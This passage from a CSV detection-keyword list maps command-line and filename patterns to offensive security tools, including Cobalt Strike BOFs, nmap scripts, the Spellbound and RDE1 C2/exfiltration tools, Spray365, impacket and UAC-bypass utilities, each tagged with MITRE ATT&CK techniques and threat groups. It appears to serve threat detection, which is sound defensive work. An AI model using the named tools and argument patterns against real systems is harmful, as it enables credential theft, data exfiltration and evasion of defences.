tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-software.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* SocialBox.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -* socks-auth-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* socks-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* socks-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Source c:\windows\*.exe -Target *.exe -Sign*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -* -Source c:\windows\system32\*.dll -Target *.exe -Sign*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -* spawn.x64.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,0,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -* spawn.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,0,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -* spawnto_x64 *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* spawnto_x86 *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* spellgen.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -* spellstager.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -* -spn cifs* -session * -clsid * -secrets*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -* -spn cifs/* -hashes*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -SpooferIP *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Tater.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* SpoolFool *.dll,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* spoolsploit *,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -* spray -ep ex-plan.s365*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --sql-shell*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - 
TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* srde_arm_musl https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_armv7 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_debug https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_linux https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_linux_aarch64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_linux_x86_64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor 
to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_macos https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_release https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_windows https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_windows_x64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_windows_x86 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* SRVHOST=127.0.0.1 SRVPORT=4444 
RAND=12345*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ssh2-enum-algos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-auth-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-hostkey.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* ssh-publickey-acceptance.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-run.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sshv1.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-ccs-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-cert.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-cert-intaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-dh-params.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-enum-ciphers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-heartbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-known-key.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-poodle.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sslv2.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sslv2-drown.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* SspiUacBypass *,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -* sstp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation 